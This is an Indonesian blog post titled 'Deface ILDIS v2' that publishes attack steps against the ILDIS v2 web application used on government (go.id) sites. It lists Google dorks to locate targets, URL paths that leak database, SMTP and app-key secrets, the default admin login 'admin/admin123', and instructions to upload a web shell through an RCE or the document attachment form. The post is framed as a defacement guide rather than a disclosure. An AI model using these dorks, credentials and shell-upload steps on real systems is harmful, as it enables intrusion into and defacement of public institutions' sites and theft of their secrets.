Ad Unit (Iklan) BIG

Deface ILDIS v2 - Information Disclosure,Default Username/Password

Post a Comment

 


-

Hai sobat

Saya ikal, 

Disini saya akan sharing - sharing nih. 

-


Disini saya akan mempublish vulnerability di WebApp ildis v2. Kalau kemarin kita bahas yang v1,sekarang kita bahas yang v2 yah. 


Vulnerability ILDIS v1 :

https://www.draxploit.web.id/2021/01/ildis-unauthenticated-sql-injection-and.html


Berbeda dengan ILDIS v1 yang memiliki tampilan lebih simple dan elegan, di ILDIS v2 ini lebih ramai tampilan indexnya, dan agak kurang mobile friendly (cacat saat ditampilkan di HandPhone).


Okeh langsung saja,  untuk information disclosurenya lumayan berguna jika kita tidak dapat login melalui Default username/passwordnya :D,  karena kita bisa disuguhkan db,smtp,appkey,pathroot.


- Dork : "ILDIS" site:go.id

               inurl:?tipe_dokumen= site:go.id

               inurl:/data_dokumen site:go.id


1.Information Disclosure. 

Letak bugnya di

https://localhost/pencarian/HaikalGanteng/detail

https://localhost/[path]/pencarian/HaikalGanteng/detail

https://localhost/pencarian?q[]=A

https://localhost/[path]/pencarian?q[]=A



For upload your shell : Copy App_Key -> Upload your shell using RCE. 

2.Default u/p.

- login page : 

https://localhost/login

https://localhost/[path]/login

- username,password

U : admin

P : admin123


Admin Login

Dashboard Page

For upload your shell : login -> Dokumen -> Tambah/Sunting -> Lampiran -> Upload Your Shell. 


Thanks

See U

Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

Post a Comment

Dapatkan Notifikasi Dengan Email